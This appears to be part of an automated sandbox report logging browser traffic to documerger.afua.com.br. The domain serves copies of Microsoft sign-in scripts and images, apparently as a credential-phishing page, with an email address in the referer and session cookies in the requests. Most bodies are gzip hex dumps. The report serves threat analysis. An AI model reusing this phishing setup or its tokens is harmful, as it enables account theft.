                                                  2024-11-27 17:10:09 UTC16384INData Raw: 95 a1 50 20 13 dc 09 ae 34 e2 7c 9d 30 c3 e4 c1 b6 9c ec e3 12 20 93 46 e3 3e 5b 03 ed 8f 67 c0 df fb 78 dd a8 ae 19 4d 00 1b f1 d1 0b 4a 7e 13 a6 94 dc 94 fe 24 50 2d cd 47 c7 3d 85 da e1 a9 62 8c 17 47 aa d5 45 78 07 f5 10 07 b4 78 d7 96 12 fa cd e1 40 53 82 00 82 12 ad ae 46 4d f9 c1 a7 c0 2f 64 02 06 d0 26 7a 72 65 91 74 91 31 d8 a2 52 17 e0 ac 82 55 04 66 ae 27 73 c2 f1 f4 4e 01 40 75 31 14 5d 18 6a c4 18 b2 35 15 0a d7 1f b2 c6 32 9c 55 a1 f8 e4 d6 c7 75 7d aa 14 55 21 35 ef fd 38 ba cc eb 7b 49 9f 4d 47 4b d0 e5 be d2 67 31 94 26 37 0c 28 1e c0 a4 59 3c 4b b5 71 c3 5c 85 c2 bd 2b ec d1 92 4d 17 61 b4 95 83 6f ef 6c 96 7c 4d d2 9b e4 cc 13 1e 9b 94 25 3b 59 f4 98 d7 35 b4 ba 8c f2 2b e1 55 59 58 bd d2 fc fe e1 bb b2 80 60 9e 8b 78 bc 40 3a 5d 23 d7
                                                  Data Ascii: P 4|0 F>[gxMJ~$P-G=bGExx@SFM/d&zret1RUf'sN@u1]j52Uu}U!58{IMGKg1&7(Y<Kq\+Maol|M%;Y5+UYX`x@:]#
                                                  2024-11-27 17:10:09 UTC16384INData Raw: cc 68 6f b7 b7 64 ca dd ae 4a d9 e6 94 0f 04 97 4e a7 c2 f3 c0 0e a7 9c 5c a7 49 24 dd 09 ec 72 ca af 8c 88 09 2d 8c 1f 39 e5 34 9e a8 6a 9e 8b 84 db 42 a7 bc 10 4d 31 6e 5a 3c b6 5b a2 db 88 43 dd 12 3d 7d fb d7 30 69 b7 16 fa f8 3e ba 0a 07 54 7e cb df 9f e6 45 7a 1b a9 00 e4 6a 68 f2 b5 bd b5 69 c2 3f 35 45 44 aa 8f 69 2a f6 d3 1c ee fe 11 06 7b 48 f3 40 04 2d 47 ba a3 09 38 bc bd 8d 86 31 dc 16 6c 9b e0 50 7c 7f 9e e4 93 68 00 ab b6 21 cd b3 1c 6c 0b 77 e6 d6 26 55 73 2e 1e b6 90 b0 bb 4d 73 77 2e 1e 76 fc 37 e9 14 ca 0c bb 3e a8 0f 9a 1e 76 57 f0 dc 87 3a 00 b7 fb c2 84 90 d5 be 66 71 11 13 14 69 6f 9a 50 4f 16 3a 3e 3a a0 9e 1c 7c fc 78 fc 91 8a 7e de fb 78 74 78 f4 13 75 e5 f0 e8 ed f1 c7 0f 7b 67 87 c7 47 ed 2d 13 cc 11 ca 6d 0b 35 2b 02 4e 38 96
                                                  Data Ascii: hodJN\I$r-94jBM1nZ<[C=}0i>T~Ezjhi?5EDi*{H@-G81lP|h!lw&Us.Msw.v7>vW:fqioPO:>:|x~xtxu{gG-m5+N8
                                                  2024-11-27 17:10:09 UTC2309INData Raw: e8 02 ed b7 1b 30 09 aa 8b f1 66 7d dd 87 be a5 89 29 6d ad 56 10 1e 45 fe f0 c5 b9 27 2d 54 f4 8d b9 67 48 81 d4 bd 69 12 41 b4 ab f6 4a a9 88 ba 2e f7 14 bf d4 b7 af c8 76 f5 ce 84 88 a4 94 5f fe db 53 02 7c b1 3a 29 cc e0 d4 b9 d5 53 c2 5a f1 1f e1 60 c9 b8 fe d9 5f a6 f1 1e 54 72 f7 2c d6 a6 25 92 b2 05 54 5c b4 7c f5 7c 28 37 70 f8 65 05 40 cc 2d 6c 6a bc cc 66 37 ee 9e 80 f9 cc fa e3 37 ef 09 3a dc 42 5c 16 d1 31 a2 c7 eb d1 b0 76 6c d1 e2 73 a3 67 88 37 5c 6a b0 71 e8 99 52 9f ad a4 04 19 38 94 39 82 75 69 60 e7 f4 5c 2a b4 a1 16 43 bd ad 52 4b 99 83 5a 36 cd 5a 4a ba 22 d3 d4 48 d1 25 4a 49 0a 37 39 2a 67 69 94 18 95 d1 95 a2 45 59 7e 67 31 04 91 52 b1 e0 10 44 c8 86 46 78 19 dd 79 81 ef 00 67 8c 2f 7c 47 71 b0 b5 45 aa 18 02 b8 0d 91 67 44 1e 8a
                                                  Data Ascii: 0f})mVE'-TgHiAJ.v_S|:)SZ`_Tr,%T\||(7pe@-ljf77:B\1vlsg7\jqR89ui`\*CRKZ6ZJ"H%JI79*giEY~g1RDFxyg/|GqEgD
                                                  2024-11-27 17:10:09 UTC9575INData Raw: ad ed ca 9b db c6 95 fc ff fb 29 6c ee ab 14 39 86 15 49 3e 92 48 c3 a8 14 3b 87 de 24 b6 c7 ce 31 bb 1e 8d 8b 92 28 99 36 45 ea 91 94 9d 4c ec ef be 7d 00 20 40 51 76 de 66 77 6a 1c 91 00 08 82 38 1a dd 8d ee 5f 7b 1d a8 08 37 c9 9e c6 fc 78 83 3b 4c 01 55 73 4a f0 d5 9d e3 41 99 b9 98 91 1a 7f 77 af 49 ff 71 83 d1 66 50 7d 23 9a 43 71 0d b7 23 b8 dd 17 3b ea 36 80 db d6 73 f1 02 ee 2d 85 b0 41 8a 08 d9 e9 b7 ee 3b a2 30 7f 7b c2 1c b5 c2 1e 2d 7b 68 ec 75 51 0e ce ca 33 78 56 c0 06 f7 85 e6 3d 77 45 a1 78 4f 65 ca 21 97 f6 af 51 af b4 ca aa 81 e3 43 0b 65 84 0e ea 64 2a 72 94 27 dd 57 b2 c7 46 34 a3 11 3d 4a 93 53 3c bb 46 15 d3 19 b9 09 78 02 be be 2a 75 a4 56 2f 81 00 5b 13 13 89 23 04 f9 19 52 73 d2 56 b3 f2 98 4c be 28 4c b7 d4 1b 27 b6 de 38 2c 55
                                                  Data Ascii: )l9I>H;$1(6EL} @Qvfwj8_{7x;LUsJAwIqfP}#Cq#;6s-A;0{-{huQ3xV=wExOe!QCed*r'WF4=JS<Fx*uV/[#RsVL(L'8,U


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  106192.168.2.64982594.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:08 UTC1735OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: script
                                                  Referer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:09 UTC1386INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:09 GMT
                                                  Content-Type: application/x-javascript
                                                  content-length: 109863
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Encoding: gzip
                                                  Last-Modified: Thu, 26 Jan 2023 00:32:54 GMT
                                                  ETag: 0x8DAFF34DD9DC630
                                                  x-ms-request-id: 7c66395a-b01e-003b-53ef-40f14d000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171008Z-1544c49f7f89lw92hC1ZRH725n00000002yg0000000045y1
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_MISS
                                                  Accept-Ranges: bytes
                                                  Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                  2024-11-27 17:10:09 UTC14998INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6b 7b db c8 91 30 fa 7d 7f 05 c5 93 68 00 13 a4 48 ea 6a 92 10 d7 e3 f1 64 bd c7 63 fb b5 3d d9 37 af cc f8 81 c8 a6 84 31 04 30 b8 d8 56 44 ee 6f 3f 55 d5 77 a0 49 c9 1e 27 9b 73 4e 9e 8c 45 34 1a 7d a9 ae ae ae aa ae cb c1 a3 bd 7f 6b 3d 6a 75 1f fe bf d6 db 77 4f de bc 6b bd fa b9 f5 ee 3f 9e bf f9 a9 f5 1a 9e fe d2 7a f9 ea dd f3 a7 cf 1e de 0e 76 8a ff bd bb 8e 8b d6 32 4e 58 0b fe 5e 46 05 5b b4 b2 b4 95 e5 ad 38 9d 67 f9 2a cb a3 92 15 ad 1b f8 37 8f a3 a4 b5 cc b3 9b 56 79 cd 5a ab 3c fb 8d cd cb a2 95 c4 45 09 1f 5d b2 24 fb dc f2 a0 b9 7c d1 7a 1d e5 e5 6d eb f9 6b bf 07 ed 33 68 2d be 8a 53 f8 7a 9e ad 6e e1 f7 75 d9 4a b3 32 9e b3 56 94 2e a8 b5 04 1e d2 82 b5 aa 74 c1 f2 d6 e7 eb 78 7e dd fa 25 9e e7 59 91
                                                  Data Ascii: k{0}hHjdc=710VDo?UwI'sNE4}k=juwOk?zv2NX^F[8g*7VyZ<E]$|zmk3h-SznuJ2V.tx~%Y
                                                  2024-11-27 17:10:09 UTC1386INData Raw: ec f3 c8 d9 e7 d9 7a 78 d4 0f a8 77 d9 a9 7b 00 ca 16 4d 63 eb 5f 0c 4c cf 01 a3 b5 83 5d cd d6 d3 73 7a 32 c0 26 c8 e3 9b 29 ff e3 f9 e4 9e 2b 72 16 fc f5 7d d1 59 c3 7f 7f e0 69 0b 36 68 6a 2f 5f fe 44 99 1d ea 3e c1 22 b6 c1 58 6e 0e 32 31 06 09 af 13 b6 c3 b6 19 8a c7 74 f8 fb bb 3e 7d 8c 8b 6d 20 fc 48 83 3d 38 ff ce 43 1d e0 26 33 1c dc e9 ac 2c e9 84 24 af 02 6d 4b b1 f1 8d e4 b3 a9 07 6b ee 63 10 b7 c3 46 10 b7 b2 c7 13 2c fe 12 ad fe c4 83 02 66 3c ae fe 91 ef 78 13 18 d5 9f 66 69 81 a1 ab 29 9e da 99 df 7c a1 2a bf c4 ac a2 18 77 7b e0 1b 25 38 9e a3 2d a9 8c 71 00 c7 3c 68 db 71 5f 04 6d 3b 3e 39 f1 7b b4 ae 6f 59 09 84 06 bb 3d f5 7b d0 e1 0a 08 d8 8b b8 28 6b 61 bc 39 29 c7 a0 ce 44 e6 3f 50 4a dd 0c d3 fd 3e c9 31 50 46 1b 0b da 94 4d 41 56
                                                  Data Ascii: zxw{Mc_L]sz2&)+r}Yi6hj/_D>"Xn21t>}m H=8C&3,$mKkcF,f<xfi)|*w{%8-q<hq_m;>9{oY={(ka9)D?PJ>1PFMAV
                                                  2024-11-27 17:10:09 UTC9510INData Raw: 23 30 22 75 c1 a1 5b a0 67 5c a3 58 32 27 9a 62 c7 a1 cd 04 4a 6f 34 45 70 03 b3 9f b8 bb 44 67 b9 38 b0 3b 37 09 72 77 d0 9d 93 c7 5d ad 74 cb 27 62 b8 95 4f e1 cc ec 52 35 5a 41 ba 85 ae 58 30 9c 7a a4 44 c9 ad f6 53 1e c9 0b d9 b1 eb 4e c8 a4 8e e4 ba 86 5b 12 3a 6f 2d f6 c5 6d f2 c4 30 68 7d 23 11 e4 9e 9b 3f 92 16 d1 30 7e c9 4a 72 85 b5 29 df 30 5f 1a eb d9 6c 18 53 82 a5 60 c4 f4 88 e1 a4 79 f5 39 95 31 36 4c f7 9f da 08 80 a3 9a ba 59 be 74 46 4c b3 9b cc 37 3d 92 b8 1f ee 9d 10 a3 05 97 29 9e c4 3e 2e 6c de d3 d8 56 b4 50 23 73 d1 f4 3b b9 0b e5 c7 f5 6d ee f9 9b b1 01 46 c9 8c 23 77 85 a0 24 36 cb 28 53 7c 77 93 65 37 c5 fa c6 fb 2d 3c b6 f1 99 42 0b 5e d1 8d 33 ba 76 60 76 87 62 70 1d c2 5b b3 43 d5 28 26 75 c7 17 04 33 de 04 4e c5 54 84 4a a3
                                                  Data Ascii: #0"u[g\X2'bJo4EpDg8;7rw]t'bOR5ZAX0zDSN[:o-m0h}#?0~Jr)0_lS`y916LYtFL7=)>.lVP#s;mF#w$6(S|we7-<B^3v`vbp[C(&u3NTJ
                                                  2024-11-27 17:10:09 UTC6289INData Raw: cd 3d fb 73 db 36 d2 bf 7f 7f 85 cd 7a 1c 22 82 9f 79 34 21 c3 ea 1c 57 ed b4 13 c7 19 ab b9 cc 8d ac 78 68 99 b2 d9 c8 62 4a 52 76 12 4b f7 b7 df 3e 00 10 20 29 c5 c9 f5 66 be 1f 6c 52 20 9e 8b c5 02 fb c0 2e 05 2d d7 3f 0a ce 04 a9 97 98 f7 e2 02 bd 76 20 51 a7 df 80 eb 09 bf 8c c7 f4 64 d7 ed 4e 1e 4e 3a 98 4c 74 6a 41 c9 c9 75 5a d2 8b 62 c3 9c 32 2a ed 18 aa 77 d2 27 a6 8a a6 1a 75 30 c4 8e aa d8 64 91 cb 00 d7 48 ac 0a 8a a2 33 6b 9d a4 b9 b1 4f 56 31 db a3 db 8b a6 08 cb 43 4f cb f0 ed ea 22 cd ef d7 08 65 5d d2 c4 ec 3a 2e 3e b4 c8 c9 76 49 58 f9 55 a7 91 2b 02 7d d4 d7 fb 20 19 aa f5 1a e2 3b e6 6f f3 9f 87 2a a6 6c 02 67 2d f5 02 db 6e 3e 75 7f 99 e8 27 39 ee 85 4b e3 9d 3c 7f fc 37 45 45 82 dd 97 82 df 3c 7d fe e4 6b e1 3c ed 9d b9 4d 0b de a6
                                                  Data Ascii: =s6z"y4!WxhbJRvK> )flR .-?v QdNN:LtjAuZb2*w'u0dH3kOV1CO"e]:.>vIXU+} ;o*lg-n>u'9K<7EE<}k<M


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  107192.168.2.64982694.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:08 UTC1779OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:09 UTC779INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:09 GMT
                                                  Content-Type: image/svg+xml
                                                  Content-Length: 673
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Encoding: gzip
                                                  Last-Modified: Wed, 12 Feb 2020 22:01:30 GMT
                                                  ETag: 0x8D7B0071D86E386
                                                  x-ms-request-id: 2b2a1d62-a01e-0061-0cef-40dfb8000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171008Z-1544c49f7f8pj9bchC1ZRHup5s00000002vg000000009qt7
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_MISS
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:09 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                  Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  108192.168.2.64982894.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:08 UTC1780OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:09 UTC780INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:09 GMT
                                                  Content-Type: image/svg+xml
                                                  Content-Length: 1435
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Encoding: gzip
                                                  Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT
                                                  ETag: 0x8D79B8373CB2849
                                                  x-ms-request-id: ebfb0f99-f01e-000d-14ef-400b82000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171009Z-1544c49f7f8bqh78hC1ZRHvhzn00000002v0000000002hqm
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_MISS
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:09 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                  Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  109192.168.2.64982013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:08 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:08 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:08 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 468
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                  ETag: "0x8DC582BBA642BF4"
                                                  x-ms-request-id: 55a12243-301e-0052-2a3a-4065d6000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171008Z-174f784596886s2bhC1EWR743w0000000x8g00000000cnrg
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
